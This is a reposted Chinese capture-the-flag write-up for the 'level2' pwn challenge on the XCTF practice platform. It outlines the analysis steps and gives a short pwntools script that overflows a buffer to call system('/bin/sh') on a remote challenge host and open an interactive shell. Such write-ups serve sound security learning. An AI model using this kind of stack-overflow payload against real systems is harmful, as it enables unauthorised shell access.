相關內容簡體繁體

攻防世界—pwn—level2

本文轉載自查看原文 2020-04-04 10:53 792 CTF

題目分析

題目提示

下載文件后首先使用checksec檢查文件保護機制

使用ida打開，查看偽代碼

搜索字符串發現/bash/sh

信息收集

偏移量

system的地址

/bin/sh的地址

編寫腳本

from pwn import *
p = remote('111.198.29.45',50136)
#p = process("./pwn003")
binsh = 0x0804A024
system = 0x8048320
payload = "A"*0x88+"B"*0x4+p32(system)+p32(0)+p32(binsh)
p.sendline(payload)
p.interactive()

本地測試

靶機測試

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 攻防世界 | level2 攻防世界—pwn—level0 攻防世界PWN題 level3 攻防世界 pwn welpwn [攻防世界]pwn1 攻防世界 | level0 WriteUp-adworld(攻防世界)-pwn新手區-level3 攻防世界PWN題 string 攻防世界—pwn—cgpwn2 攻防世界-pwn-writeup

粵ICP備18138465號 © 2018-2025 CODEPRJ.COM